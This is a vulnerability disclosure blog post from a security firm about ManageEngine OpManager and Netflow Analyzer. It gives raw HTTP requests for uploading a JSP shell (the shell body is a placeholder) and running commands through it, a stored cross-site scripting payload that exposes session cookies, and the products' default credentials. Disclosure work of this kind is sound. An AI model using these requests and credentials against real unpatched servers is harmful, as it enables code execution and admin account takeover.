Vulnerability Discovered in ManageEngine Products

Vulnerability Discovered in ManageEngine Products

Perspective Risk Identifies Vulnerability in ManageEngine Products

Welcome to this technical blog by Perspective Risk’s InfoSec specialist Sasha Raljic in relation to a vulnerability he recently discovered in the ManageEngine products. Raljic responsibly disclosed the vulnerability to the vendor and they released a fix on the 25th of January, hence the publication of this information 24 hours later.

Sasha Raljic Twitter: @RSasha512

Introduction to ManageEngine Products

OpManager and Netflow Analyzer are two products made and distributed by ManageEngine. According to their website three of every five Fortune 500 companies utilise one of the ManageEngine products to manage their infrastructure.

While identified vulnerabilities could be present in other products as well, only OpManager and Netflow Analyzer were tested (as I used those two products on my home network). OpManager is used for network monitoring; however, it also has netflow analysis capability. Netflow Analyzer on the other hand is only able to perform netflow analysis and provide users with network usage statistics. Furthermore, it is also able to detect various security violations, which mainly include different types of port scans.

Both products share the same code base and vulnerabilities found in one product were also found in the other. Both vulnerabilities are fairly trivial and given more time, I am sure other serious issues would also surface. It should also be noted that ManageEngine does not have a great reputation when it comes to security, evidenced by the number of CVEs assigned in the recent past.

Widespread Usage of ManageEngine Products

The list of companies that use ManageEngine products is extensive. Some of these companies and organisations include:

  • Barclays
  • SONY
  • Amazon
  • AT&T
  • Siemens
  • US Army Aviation & Missile Command
  • The United States Navy

I must point out that this list is taken from the ManageEngine website and as a result, I can’t comment on its accuracy. If this information is correct, any vulnerability discovered in any of the ManageEngine products (of which there are around 40) could have a serious impact on these organisations.

Multiple Vulnerabilities in ManageEngine OpManager and Netflow Analyzer

As stated, these issues were responsibly disclosed to ManageEngine and at the time of writing are fixed in version 12200. The vendor reacted promptly and patched the issues within a couple of days.

The issues arise due to the way in which file uploads are handled by the ManageEngine OpManager and Netflow Analyzer. Both standard and admin users have the ability to upload files in 2 specific locations (alarms and group chat) and in both cases upload functionality accepts JSP file types which can then be executed on the remote server.

The ability to upload and execute arbitrary JSP files has a significant impact on the application and the underlying server due to the code execution that results from poorly implemented filtering mechanisms.

Similarly, the ManageEngine cross-site scripting vulnerability discovered could also have a significant impact on application users. A successful attack could result in a compromise of the targeted user’s account and, depending on other factors, could lead to access to other applications used by the user. Other typical attacks associated with the successful exploitation of cross-site scripting include keystroke logging, redirection of a user to malicious web sites with an aim to compromise the user’s machine and credential harvesting through injecting fake login pages.

The following table provides details of the environment used for testing, together with the default privileges under which the applications operate. Please note that default installations of the ManageEngine applications were used and no changes were made to the application post-installation.

Operating System Software Version Build Number Account Privileges Obtained
Windows 7 Professional OpManager version 12.0 12200 SYSTEM
Netflow Analyzer version 12
Ubuntu Server 14.04 OpManager version 12.0 12200 ROOT
Netflow Analyzer version 12

File Upload Vulnerabilities

Uploading a JSP Shell via ALARMS Upload Functionality – Standard User

The following requests were made as standard and admin users which triggered the vulnerability. Screenshots are shown for additional information.

It should be noted that HTTP requests initiated by the standard user are identical to HTTP requests initiated by the admin user. As a result, only one request has been provided. Furthermore, requests issued to Netflow Analyzer and OpManager were identical, as they are based on the same code. As a result, any API call issued by OpManager can be found in Netflow Analyzer as well.

POST
/api/json/dashboard/addPost?apiKey=f5d6d9518fa3a9dd06bceaa8d65c94db&groupID=0&entityID=2&entityType=alarm HTTP/1.1
Host: localhost:7070
Content-Length: 1095
Accept: */*
Origin: http://localhost:7070
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/54.0.2840.99 Safari/537.36
OPMCurrentRoute:
http%3A%2F%2Flocalhost%3A7070%2Fapiclient%2Fember%2Findex.jsp%23%2FAlarms%2FAlarm%2
FDetails%2F172.16.0.237_Poll
Content-Type: multipart/form-data; boundary=—-WebKitFormBoundarydhd36goiFvJxUOtm
Referer: http://localhost:7070/apiclient/ember/index.jsp
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
Cookie:f2RedirectUrl=null; encryptPassForAutomaticSignin=zANc8X8;
userNameForAutomaticSignin=test@test.com; domainNameForAutomaticSignin=Authenticator;
signInAutomatically=true; authrule_name=Authenticator;
JSESSIONID=A4DE70D37728748E02F4D7E5D52E7663;
NFA__SSO=20DA75BDC54DF2A1A4D3DDF116D73FBA
Connection:close

——WebKitFormBoundarydhd36goiFvJxUOtm
Content-Disposition: form-data; name=”post”

shell_upload_as_standard_user
——WebKitFormBoundarydhd36goiFvJxUOtm
Content-Disposition: form-data; name=”[object HTMLInputElement]i”; filename=”shell.jsp”
Content-Type: application/octet-stream

<<<<Insert JP Shell>>>>>

——WebKitFormBoundarydhd36goiFvJxUOtm—

Shell Execution

Once the file upload is complete, the JSP shell can be retrieved from the following location:

GET /itplus/FileStorage/314/shell.jsp?cmd=whoami HTTP/1.1
Host:localhost:7070
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/54.0.2840.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://localhost:7070/itplus/FileStorage/314/shell.jsp
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8
Cookie: f2RedirectUrl=null; encryptPassForAutomaticSignin=zANc8X8;
userNameForAutomaticSignin=test@test.com; domainNameForAutomaticSignin=Authenticator;
signInAutomatically=true; authrule_name=Authenticator; JSESSIONID=A4DE70D37728748E02F4D7E5D52E7663;
NFA__SSO=20DA75BDC54DF2A1A4D3DDF116D73FBA
Connection: close

Uploading a JSP Shell via CHAT Upload Functionality – Standard User

Similarly, the same issue exists in the Chat Upload feature:

POST /api/json/dashboard/addPost?apiKey=f5d6d9518fa3a9dd06bceaa8d65c94db&groupID=0 HTTP/1.1
Host: localhost:7070
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
OPMCurrentRoute: http%3A%2F%2Flocalhost%3A7070%2Fapiclient%2Fember%2Findex.jsp%23%2FITPlus
X-Requested-With: XMLHttpRequest
Referer: http://localhost:7070/apiclient/ember/index.jsp
Content-Length: 1094
Content-Type: multipart/form-data; boundary=—————————3052928669907
Cookie: JSESSIONID=092E669EA8E259987E4E45F400F679C8; f2RedirectUrl=null; domainNameForAutomaticSignin=Authenticator; authrule_name=Authenticator; encryptPassForAutomaticSignin=zAJV4C9;
userNameForAutomaticSignin=test@test.com; signInAutomatically=true;
NFA__SSO=DC2FD98823246FF053E1A2E71A0B4EE5
Connection: close 

—————————–3052928669907

Content-Disposition: form-data; name=”post” 

shell_as_standard_user
—————————–3052928669907

Content-Disposition: form-data; name=”[object HTMLInputElement]i”; filename=”shell.jsp”
Content-Type: application/octet-stream 

<<<<Insert JSP Shell>>>>>> 

—————————–3052928669907—

Shell Execution

Once again command execution can be performed via the following:

GET /itplus/FileStorage/2/shell.jsp?cmd=whoami HTTP/1.1
Host: localhost:7070
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:7070/itplus/FileStorage/2/shell.jsp
Cookie: JSESSIONID=F2E96460C6D4956CFC7893791AE253A3; f2RedirectUrl=null;
domainNameForAutomaticSignin=Authenticator; authrule_name=Authenticator;
encryptPassForAutomaticSignin=d7963B4t; userNameForAutomaticSignin=admin; signInAutomatically=true;
NFA__SSO=8E16089CBAD535B56272434E0B3331F7
Connection: close
Upgrade-Insecure-Requests: 1

The “whoami” command reveals that both OpManager and Netflow Analyzer run with SYSTEM privileges on Windows and Root privileges on Linux. As a result, a successful compromise would grant malicious attackers access to a privileged account which could be used to further enumerate the underlying host.

Persistent Cross-Site Scripting Vulnerability

In addition to the aforementioned code execution vulnerability, it is also possible to upload persistent cross-site scripting payloads using a standard user account.

This vulnerability would be rendered when an application admin logs in. As a result, standard users could target administrative users and perform account takeover attacks.

Furthermore, combining this issue with a previously identified vulnerability, which relates to the storage of usernames and passwords in session cookie values, it would be possible retrieve the admin user password.

Further details of the previously discovered weak password obfuscation vulnerability can be found on SecurityFocus.(1).

A proof of concept request, in which JavaScript is uploaded to the application is provided below:

POST /api/json/maps/extractGMap?apiKey=f5d6d9518fa3a9dd06bceaa8d65c94db HTTP/1.1

Host: localhost:7070

Content-Length: 267

Accept: application/json, text/javascript, */*; q=0.01

Origin: http://localhost:7070

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36

OPMCurrentRoute: http%3A%2F%2Flocalhost%3A7070%2Fapiclient%2Fember%2Findex.jsp%23%2FEndUser%2FList

Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryj4RahZrYpCEYZ8Gq

Referer: http://localhost:7070/apiclient/ember/index.jsp

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.8

Cookie: f2RedirectUrl=null; encryptPassForAutomaticSignin=zANc8X8; userNameForAutomaticSignin=test@test.com; domainNameForAutomaticSignin=Authenticator; signInAutomatically=true; authrule_name=Authenticator; JSESSIONID=7A9DB2DB93AABC58367F9DECF3A1ACE4; NFA__SSO=403DE7565532C8C8FBC0421722902918

Connection: close

——WebKitFormBoundaryj4RahZrYpCEYZ8Gq

Content-Disposition: form-data; name=”file”; filename=”xss_mouseover.html”

Content-Type: text/html

<html>

<body>

<a onmouseover=alert(document.cookie)>xss</a>

</body>

</html>

——WebKitFormBoundaryj4RahZrYpCEYZ8Gq—

Once an admin user logs in, the JavaScript executes and in this case the session token is displayed:

As can be seen, session cookies store the username and password. While the user password is encrypted, this encryption method was found to be easily reversible. A python script exists on Github (2) that can easily reverse this obfuscation method.

Ease of Exploit

These vulnerabilities require malicious attackers to be already authenticated to the vulnerable applications. This can be achieved by either using default admin credentials (admin:admin) or by using a trialuserlogin account that is automatically created during the installation process.

This trialuserlogin account (trialuserlogin:trialuserlogin) also has administrative privileges. It should be noted that admin privileges are not required to exploit this issue. A standard user account is able to access vulnerable sections of the applications which can then be exploited to retrieve admin credentials or execute arbitrary code on the underlying host.

References

  1. Security Focus (2016, August). SecurityFocus. Retrieved from Multiple Vulnerabilities in WebNMS Framework.
  2. denandz. (2016, January). OpManager-Decrypter. Retrieved from Github.

If you would like Perspective Risk’s help with your information security, feel free to click here to contact us.

Related Content

PRCON 2011
Announcements

PRCON 2011

Whilst we are ardent supporters of maintaining a healthy balance between work and life and well awar...

Read More 30 Aug 2011
Welcome to the Perspective Risk Blog
Announcements

Welcome to the Perspective Risk Blog

The Perspective Risk blog has been created to provide information security resources to the penetrat...

Read More 4 Jan 2012